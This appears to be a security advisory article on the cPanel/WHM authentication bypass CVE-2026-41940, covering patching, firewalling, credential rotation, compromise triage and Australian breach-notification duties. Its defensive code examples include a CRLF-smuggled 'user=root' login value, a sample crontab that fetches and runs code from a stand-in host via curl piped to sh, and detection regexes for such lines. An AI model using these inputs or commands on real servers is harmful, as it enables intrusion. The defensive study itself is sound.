1 May 2026 Vulnerability

CVE-2026-41940: cPanel & WHM's Critical Authentication Bypass Is Under Active Attack in Australia

A critical authentication bypass in cPanel and WebHost Manager (WHM) has been actively exploited in Australia since at least February 2026 — a full two months before cPanel disclosed the flaw or issued a patch. Tracked as CVE-2026-41940 and scored CVSS 9.8, the vulnerability allows an unauthenticated attacker to gain full administrative control of a cPanel server, and by extension, every website, database, and email account it manages. Australia's ACSC confirmed active exploitation on 30 April 2026, the same day cPanel released emergency patches. With an estimated 70 million domains running on cPanel globally, the window for exploitation was large, and patching alone is not the end of the story.

Disclosure: This post contains affiliate links. We only recommend tools we've researched and trust. If you purchase through our links, we may earn a commission at no extra cost to you.

What Is CVE-2026-41940, and Why Is It Rated CVSS 9.8?

cPanel and WebHost Manager (WHM) are the control panel software running on the majority of shared and managed web hosting infrastructure worldwide. If you use a hosting provider — for a WordPress site, a small business email, an e-commerce store, or a web application — there is a reasonable chance the server is managed with cPanel. According to the vendor's own figures, cPanel infrastructure underpins roughly 70 million domains across hundreds of thousands of hosting servers globally.

CVE-2026-41940 is a missing authentication vulnerability, classified under CWE-306 (Missing Authentication for Critical Function), that allows an unauthenticated remote attacker to bypass cPanel's login process entirely and gain administrative access to the hosting panel. The National Vulnerability Database rates it CVSS 9.8 out of 10 — the near-maximum severity assigned to remotely exploitable, pre-authentication flaws requiring no interaction from a legitimate user. The vulnerability affects all supported cPanel and WHM versions released after version 11.40, a release from 2013, meaning over a decade of software versions are in scope. WP Squared, a WordPress hosting management panel built on the cPanel platform, is also affected.

The scope of what "administrative access to cPanel" means in practice is worth spelling out. A successful attacker gains control of everything the panel manages: every hosted website and its files, every database, and every email account on the server, and, because the ACSC advisory notes that the bypass can be extended to remote code execution, the underlying server operating system as well.

For a small business whose hosting account contains their website, their customer data, and their business email, a full cPanel compromise is effectively a complete breach. Under Australia's Notifiable Data Breaches (NDB) scheme, an organisation that is unable to rule out unauthorised access to personal information held on a compromised server has obligations to assess and, in most cases, notify the Office of the Australian Information Commissioner (OAIC) — a process that carries legal deadlines, reputational costs, and in some cases, regulatory scrutiny.

cPanel released patches on 30 April 2026. The patched versions are 11.110.0.97, 11.118.0.63, 11.126.0.54, 11.132.0.29, 11.134.0.20, and 11.136.0.5, along with WP Squared version 136.1.7. Shared hosting providers typically apply these updates automatically; customers on self-managed or semi-managed virtual private servers need to verify their version and update manually.

A Zero-Day Exploited for Two Months Before Disclosure

The timeline of CVE-2026-41940 is what distinguishes it from a routine critical patch. Managed hosting provider KnownHost confirmed that targeted exploitation of the vulnerability was observed as early as 23 February 2026, and security researchers believe exploitation may have begun even earlier. The flaw was not publicly disclosed until 30 April 2026 — meaning attackers operated with an uncontested window of at least two months during which they could exploit vulnerable servers without any defender having a patch, a CVE number, or even public knowledge that the flaw existed.

This zero-day exploitation period has a practical implication that extends beyond "patch now": servers that were accessible to the internet during the February–April window should be treated as potentially compromised, not merely unpatched. Patching a server closes the door, but it does not evict an attacker who has already entered. Persistence mechanisms — backdoor scripts, modified configuration files, rogue SSH keys, or web shells — may have been installed well before the patch became available.

CISA added CVE-2026-41940 to its Known Exploited Vulnerabilities (KEV) catalogue, citing evidence of active exploitation in the wild. The KEV is maintained as an authoritative list of vulnerabilities with confirmed attacker activity; inclusion is not speculative. For Australian government agencies and regulated entities, the CISA KEV has become an informal reference point alongside ACSC advisories for prioritising remediation timelines.

Australia's ACSC issued its own advisory on 30 April 2026 confirming that it was aware of active exploitation of CVE-2026-41940 in Australia. The advisory notes that successful exploitation enables authentication bypass and potential remote code execution — the latter being an extension of the initial access path that allows attackers to execute arbitrary commands on the underlying server operating system, not merely manipulate the cPanel interface. For Australian small businesses and website operators, an ACSC advisory represents the most direct signal from the national cyber authority that a threat is actively targeting domestic infrastructure.

The combination of a near-maximum CVSS score, confirmed exploitation in Australia before public disclosure, CISA KEV listing, and cPanel's enormous installed base makes CVE-2026-41940 one of the more consequential hosting-layer vulnerabilities of 2026. Security outlet Help Net Security reported that over 1.5 million cPanel instances are potentially at risk.

How the Authentication Bypass Works

The technical root cause of CVE-2026-41940 is a CRLF injection vulnerability in cPanel's login and session management process. Security researchers at watchTowr Labs published an analysis after the patch was released, and the mechanics illustrate why this class of vulnerability is difficult to detect from the outside and easy to exploit once understood.

When a user attempts to log in to cPanel, the software writes request data, including user-supplied input from the login form, into a server-side session file before it has verified the user's identity. This is an architectural problem: data from an unauthenticated user is being stored as session state before authentication has been confirmed. Storing it early would be tolerable only if the input were strictly validated first, and it is not.

An attacker can embed carriage return and line feed characters (\r\n) into the password field of the login request. Because cPanel writes this input into the session file without sanitising for line-break characters, each injected line break starts a new record, so the attacker can append arbitrary key-value pairs to the session. By inserting content such as user=root, the attacker causes cPanel to load a session record that already asserts an administrative identity, without ever having supplied a valid password. The server is, in effect, told that the attacker is already a trusted administrator.

A secondary attack path involves manipulating the whostmgrsession cookie. By omitting an expected segment of the cookie value, an attacker can bypass the encryption and verification steps that would normally reject an unauthenticated session. The two approaches can be combined to reliably obtain root-level access to the WHM administrative interface from a single unauthenticated HTTP request.
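The following is an added illustration of the injection class described above, written for this edit; it is a toy model and not cPanel's code, and it makes no claim about cPanel's real session file format. The record layout (one key=value pair per CRLF-terminated line), the field names "user" and "pass", and the sample input are all assumptions for the example. The point it shows is why the fix belongs at the point where untrusted input is serialised: a line-oriented store that does not reject line breaks lets a value become extra records, and a later record overwrites an earlier one.

```python
"""Toy line-oriented session store: vulnerable writer beside a hardened one.

Added example, not cPanel's implementation. Record layout, field names and
sample input are assumptions chosen to mirror the article's description."""

import re

# Assumed record layout: one "key=value" pair per line, terminated by CRLF.
LINE_END = "\r\n"


def write_session_vulnerable(fields: dict) -> str:
    """Serialise fields WITHOUT rejecting line breaks in values.

    Models the defect the article describes: untrusted input is persisted as
    session state before authentication, and a value that contains CRLF is
    written verbatim, so it turns into additional records."""
    return "".join(f"{k}={v}{LINE_END}" for k, v in fields.items())


def parse_session(record: str) -> dict:
    """Read a record back; a later key silently overwrites an earlier one."""
    session = {}
    for line in record.split(LINE_END):
        if not line:
            continue
        key, _, value = line.partition("=")
        session[key] = value
    return session


class RejectedInput(ValueError):
    pass


# CR, LF and every other ASCII control character, plus DEL.
_CONTROL = re.compile(r"[\x00-\x1f\x7f]")


def write_session_hardened(fields: dict) -> str:
    """Same serialisation, but refuse any key or value carrying control characters.

    Rejecting rather than stripping is deliberate: a stripped value changes
    meaning silently, and a password containing CR or LF has no legitimate use."""
    for k, v in fields.items():
        if _CONTROL.search(k) or _CONTROL.search(v) or "=" in k:
            raise RejectedInput(f"control character or separator in field {k!r}")
    return write_session_vulnerable(fields)


def demo() -> tuple:
    """Returns (identity the vulnerable store ends up with, whether hardened store blocked it)."""
    # Constructed input: an unauthenticated login attempt whose password field
    # smuggles a second record. "user=root" mirrors the article's description.
    hostile = {"user": "nobody", "pass": "x" + LINE_END + "user=root"}

    leaked = parse_session(write_session_vulnerable(hostile))
    try:
        write_session_hardened(hostile)
        blocked = False
    except RejectedInput:
        blocked = True
    return leaked["user"], blocked


if __name__ == "__main__":
    print(demo())  # ('root', True)
```

Note that the hardened writer fixes the defect at its source. An edge filter (a WAF rule) can stop the same bytes earlier, but any code path that persists untrusted input in a line- or separator-delimited format needs this check regardless of what sits in front of it.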

What attackers do once inside

Once an attacker holds WHM administrative access, their options are broad and the consequences for hosted websites immediate. Combined with the remote code execution path the ACSC advisory describes and the persistence mechanisms noted earlier (backdoor scripts, modified configuration files, rogue SSH keys, web shells), the attacker is no longer confined to the panel: every hosted site, database and mailbox, and the server beneath them, is within reach.

Researchers noted that a proof-of-concept (PoC) exploit became publicly available shortly after the patch release on 30 April 2026. The availability of a public PoC significantly lowers the barrier for less sophisticated attackers, shifting exploitation from targeted activity to broad opportunistic scanning of internet-facing cPanel ports. Any server not yet patched after the PoC's release is facing a materially wider threat pool than during the original zero-day window.

What to Do Right Now: Patching, Mitigation, and Compromise Assessment

The immediate priority is confirming whether the patch has been applied to any servers running cPanel or WHM. For shared hosting customers, your provider should have pushed updates automatically — verify by logging in to cPanel and checking the version number in the footer, or navigating to WHM > cPanel > Upgrade to Latest Version. The patched versions are 11.110.0.97, 11.118.0.63, 11.126.0.54, 11.132.0.29, 11.134.0.20, and 11.136.0.5. If your server is running an earlier version number in any of these branches, the update has not yet been applied.

For customers on self-managed virtual private servers or dedicated servers, the standard update command run as root is /scripts/upcp --force. After updating, confirm the version number reflects a patched release before treating the server as protected.
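As an added example for the verification step above (this is not a cPanel-supplied tool), the following script compares an installed version string against the fixed builds the article lists, branch by branch. It assumes the installed version is recorded in /usr/local/cpanel/version, the conventional location (confirm on your own host), and that it has the four-field form MAJOR.BRANCH.MINOR.BUILD, for example 11.110.0.97. A branch not in the table is reported as unknown rather than assumed safe.

```python
"""Decide whether a cPanel/WHM version string is at or past the fixed build
for its branch. Added example, not a cPanel tool; the version file path is
an assumption about the conventional install layout."""

from pathlib import Path

# Fixed builds named in the article, keyed by release branch (second field).
PATCHED = {
    110: (11, 110, 0, 97),
    118: (11, 118, 0, 63),
    126: (11, 126, 0, 54),
    132: (11, 132, 0, 29),
    134: (11, 134, 0, 20),
    136: (11, 136, 0, 5),
}

VERSION_FILE = Path("/usr/local/cpanel/version")  # assumed location


def parse_version(text: str) -> tuple:
    """'11.110.0.97\\n' -> (11, 110, 0, 97); anything else is an error, not a guess."""
    parts = text.strip().split(".")
    if len(parts) != 4 or not all(p.isdigit() for p in parts):
        raise ValueError(f"unrecognised cPanel version string: {text!r}")
    return tuple(int(p) for p in parts)


def assess(version_text: str) -> str:
    """Return 'patched', 'vulnerable' or 'unknown-branch'.

    Branches absent from the table are reported as unknown on purpose: the
    article puts everything after 11.40 in scope, and a branch with no listed
    fix cannot be treated as safe just because the comparison has nothing to
    compare against."""
    v = parse_version(version_text)
    fixed = PATCHED.get(v[1])
    if fixed is None:
        return "unknown-branch"
    return "patched" if v >= fixed else "vulnerable"


def assess_host(path: Path = VERSION_FILE) -> str:
    """Read the installed version from disk and assess it."""
    return assess(path.read_text())


if __name__ == "__main__":
    try:
        print(assess_host())
    except FileNotFoundError:
        print(f"{VERSION_FILE} not found; is this a cPanel host?")
```

Run it as root after /scripts/upcp --force completes; treat anything other than "patched" as unfinished, and check with your provider before assuming an "unknown-branch" host can be fixed in place rather than upgraded to a supported branch.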

Network-level mitigation can reduce exposure even before patching is confirmed. The ACSC advisory recommends blocking inbound traffic on cPanel's management ports at the firewall: port 2083 (cPanel), port 2087 (WHM), port 2095 (Webmail), and port 2096 (Webmail SSL). The first two are the TLS ports; if the plaintext counterparts (2082 for cPanel, 2086 for WHM) are still enabled on a host, restrict them in the same rule. Limiting these ports to a defined allowlist of trusted IP addresses (your office IP, a VPN exit node, or your managed hosting provider's IP range) removes the attack surface for everyone outside that list, which includes the opportunistic scanners a public PoC attracts. For servers where web management access can be VPN-gated, this is the appropriate architecture regardless of patch status and should be considered permanent configuration, not just a temporary workaround.

Credential rotation is mandatory for any server exposed to the internet during the February–April window. Change the root password, all cPanel account passwords, all database credentials, and any API tokens or SSH keys stored on the server. If attackers created new accounts during the exploitation window, those accounts may persist even after a password reset of the original admin — audit your user list for unexpected accounts, particularly any created between late February and the end of April 2026.

Compromise assessment is where the picture becomes more complex for Australian businesses. Patching does not confirm the server was not already compromised during the zero-day window. A server that was internet-facing from February to April 2026 and running a vulnerable cPanel version should be treated as potentially containing attacker-placed persistence mechanisms. Manual review of recently modified files, scheduled tasks (cron jobs), and server logs is a starting point but is not comprehensive — sophisticated attackers routinely clear or modify logs as part of their post-exploitation tradecraft.
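The helpers below are an added example of a first-pass triage over the three areas just named (recently modified files, rogue SSH keys, and cron persistence). They are not a cPanel or ACSC tool, the suspicious-cron patterns are this example's own heuristics, and the sample files, keys and crontab are constructed inline so the script runs offline. They produce a review list for a person; an empty result is not evidence of a clean host, because mtimes and logs are trivially altered by anyone with root.

```python
"""First-pass compromise triage for the article's exploitation window.

Added example with constructed sample data; heuristics are the example's own."""

from datetime import datetime, timezone
import os
import re
import tempfile

# Window from the article: first observed exploitation to patch release.
WINDOW_START = datetime(2026, 2, 23, tzinfo=timezone.utc)
WINDOW_END = datetime(2026, 5, 1, tzinfo=timezone.utc)  # exclusive


def files_modified_in_window(root: str, start=WINDOW_START, end=WINDOW_END) -> list:
    """Paths under root whose mtime falls inside [start, end).

    mtime is easily forged, so this is a list to review, not a verdict."""
    hits = []
    for dirpath, _, names in os.walk(root):
        for n in names:
            p = os.path.join(dirpath, n)
            m = datetime.fromtimestamp(os.stat(p).st_mtime, tz=timezone.utc)
            if start <= m < end:
                hits.append(p)
    return sorted(hits)


def unexpected_keys(authorized_keys: str, known: set) -> list:
    """Lines of an authorized_keys file whose key material is not in `known`.

    Handles the optional options prefix (e.g. 'no-pty') before the key type."""
    out = []
    for line in authorized_keys.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        for i, f in enumerate(fields):
            if f.startswith(("ssh-", "ecdsa-", "sk-")):
                if i + 1 >= len(fields) or fields[i + 1] not in known:
                    out.append(line)
                break
    return out


# Crude persistence patterns (assumption-based heuristics, extend for your estate).
_SUSPECT = re.compile(r"(/tmp/|/dev/shm/|curl\s+[^|]*\|\s*(ba)?sh|base64\s+-d)")


def suspicious_cron(crontab: str) -> list:
    """Cron lines matching the patterns above; comments and blanks are skipped."""
    return [l for l in crontab.splitlines()
            if l.strip() and not l.lstrip().startswith("#") and _SUSPECT.search(l)]


# Constructed sample data: one known office key and one unknown key with options.
SAMPLE_KEYS = """# constructed sample
ssh-ed25519 AAAAC3KNOWN admin@office
no-pty ssh-rsa AAAAB3UNKNOWN backup
"""

# Constructed sample crontab: a legitimate cPanel update job and two planted entries.
SAMPLE_CRON = """# constructed sample
0 3 * * * /usr/local/cpanel/scripts/upcp
*/5 * * * * curl -s http://198.51.100.7/x | sh
@reboot /bin/sh /dev/shm/.s
"""


def demo() -> dict:
    """Run all three checks over constructed data and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        old = os.path.join(root, "index.php")
        new = os.path.join(root, "wp-includes", "cache.php")
        os.makedirs(os.path.dirname(new))
        for p in (old, new):
            with open(p, "w") as fh:
                fh.write("<?php\n")
        # One file untouched since before the window, one modified inside it.
        os.utime(old, (0, datetime(2025, 12, 1, tzinfo=timezone.utc).timestamp()))
        os.utime(new, (0, datetime(2026, 3, 15, tzinfo=timezone.utc).timestamp()))
        files = [os.path.relpath(p, root) for p in files_modified_in_window(root)]
    return {
        "files": files,
        "keys": unexpected_keys(SAMPLE_KEYS, {"AAAAC3KNOWN"}),
        "cron": suspicious_cron(SAMPLE_CRON),
    }


if __name__ == "__main__":
    for section, items in demo().items():
        print(section, items)
```

On a real host, point files_modified_in_window at the document roots and at /etc, feed unexpected_keys the authorized_keys of root and every cPanel account, and run suspicious_cron over root's crontab and each account's crontab. Anything the script surfaces goes to a person, and a non-empty list on a host that was exposed during the window is the point at which the NDB assessment described below should start, not end.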

For Australian small businesses and website operators who need deeper assurance, Sucuri's website security platform provides server-side malware scanning that goes beyond what browser-based or external scanners can reach. Sucuri performs deep file-level analysis to detect injected PHP, web shells, and secondary backdoor scripts — precisely the category of persistence that a cPanel attacker would place. The platform's malware removal service is available for sites where the scope of an existing compromise needs to be assessed and cleaned professionally, including sites where the attacker's dwell time during the zero-day window is uncertain.

The Australian Context: NDB Obligations and Layered Web Hosting Defence

Australia's Notifiable Data Breaches scheme, operating under the Privacy Act 1988, creates specific obligations for organisations that hold personal information. If a cPanel server compromise may have resulted in unauthorised access to customer records, contact information, or any personal data, including names and email addresses captured through website forms or stored in e-commerce databases, the entity responsible for that data must assess whether an eligible data breach has occurred (one likely to result in serious harm to the individuals concerned), completing that assessment within 30 days of becoming aware of grounds for suspicion, and, if it concludes the breach is eligible, must notify the OAIC and the affected individuals as soon as practicable.

"Becoming aware" has been interpreted broadly by the OAIC to mean the point at which a reasonable suspicion of a breach arises, not when it is confirmed by forensic evidence. An organisation that learns of CVE-2026-41940, determines their server ran a vulnerable version during the zero-day window, and cannot rule out compromise has, in the OAIC's framing, grounds to begin the formal assessment process. Waiting for forensic confirmation before initiating assessment is not consistent with the scheme's obligations under the Privacy Act.

For organisations running Australia-facing e-commerce sites on cPanel hosting, the data categories at risk extend beyond contact details to include order histories, delivery addresses, and potentially stored payment information depending on the checkout configuration. Payment card data carries additional obligations under the PCI DSS framework, and any indication of compromise affecting card data may also trigger notification to the relevant payment processor and acquiring bank.

Beyond this incident, CVE-2026-41940 illustrates a recurring vulnerability pattern for shared hosting infrastructure: control planes — the software that manages servers — are frequently less hardened than the applications running on top of them. Hardening a WordPress installation with strong passwords and up-to-date plugins does nothing if the cPanel layer underneath can be bypassed without authentication. The attack surface extends below the application layer.

A layered defence posture for Australian website operators, independent of any specific vulnerability, combines the controls covered above: management ports reachable only from an allowlist or over a VPN, prompt patching with the installed version verified afterwards, credential rotation and regular audits of accounts and SSH keys, server-side file monitoring, and a web application firewall in front of the management interface.

For the scanning and web application firewall layer, Sucuri Website Security provides both continuous file monitoring and a WAF that can filter malicious HTTP requests, including the kind of CRLF-manipulated login attempts that exploit CVE-2026-41940, before they reach the cPanel interface. One caveat applies to any WAF: it only inspects traffic that is actually routed through it. A cloud WAF that proxies your website's hostname on ports 80 and 443 does not see requests sent straight to the server's IP on 2083 or 2087, so the management ports must either be placed behind the WAF as well or, more simply, be firewalled to an allowlist. With that in place, a WAF positioned in front of web-facing management interfaces adds a detection and blocking layer that log-level monitoring alone cannot provide, and is particularly valuable during the window between vulnerability disclosure and patch deployment.
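The following is an added example of the edge rule a WAF would apply to login posts on the cPanel ports; it is not Sucuri's rule set and not cPanel's code. It assumes a form-encoded body with fields named "user" and "pass" (assumed names) and decodes the body first, because a CRLF arrives on the wire as %0d%0a and only becomes a line break after URL decoding, which is where a naive filter that inspects the raw body misses it. The sample requests are constructed for the example.

```python
"""Edge filter for form-encoded login bodies: block CR/LF and other control
characters in credential fields after URL decoding.

Added example, not a vendor rule. Field names and sample requests are assumptions."""

from urllib.parse import parse_qsl

LOGIN_FIELDS = {"user", "pass"}  # assumed form field names


def decode_form(body: str) -> dict:
    """URL-decode an application/x-www-form-urlencoded body into a dict.

    keep_blank_values=True so an empty field is still inspected; strict
    parsing stays off so a malformed body still yields what it can."""
    return dict(parse_qsl(body, keep_blank_values=True))


def login_request_verdict(body: str) -> tuple:
    """Return (allow, reason) for one login body.

    CR/LF is checked first so the log reason names the smuggling attempt
    explicitly; any other control character is rejected too, since no valid
    username or password needs one. Fields outside LOGIN_FIELDS are ignored."""
    fields = decode_form(body)
    for name in sorted(LOGIN_FIELDS & fields.keys()):
        value = fields[name]
        if "\r" in value or "\n" in value:
            return False, f"CRLF in {name}"
        if any(ord(c) < 0x20 or ord(c) == 0x7F for c in value):
            return False, f"control character in {name}"
    return True, "ok"


def filter_batch(bodies: list) -> list:
    """Apply the verdict to a list of bodies; convenient for replaying captures."""
    return [login_request_verdict(b) for b in bodies]


# Constructed sample bodies: a normal login, a %0d%0a smuggling attempt
# (mirroring the article's description), and a stray NUL byte.
SAMPLE_BODIES = [
    "user=alice&pass=Correct%20Horse%2BBattery",
    "user=x&pass=y%0d%0auser%3Droot",
    "user=x&pass=a%00b",
]


if __name__ == "__main__":
    for body, verdict in zip(SAMPLE_BODIES, filter_batch(SAMPLE_BODIES)):
        print(verdict, body)
```

Deploy this kind of rule on whatever actually terminates requests to ports 2083 and 2087, and log the blocked body (with the password field redacted) so that a spike of "CRLF in pass" verdicts becomes a detection signal rather than a silent drop. The rule is a stopgap for the disclosure-to-patch window; it does not replace the patch, and it does nothing for a multipart or JSON login body unless a decoder for that format is added.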

For businesses with questions about their NDB obligations following a potential hosting compromise, the OAIC publishes an online assessment tool at oaic.gov.au, and the ACSC's cyber incident reporting form at cyber.gov.au is the appropriate starting point for reporting suspected exploitation to the national cyber authority.


The views expressed in this article are editorial opinion and general information only. They do not constitute professional security, legal, or financial advice. Always verify details with primary sources and consult a qualified professional before making security decisions based on this content.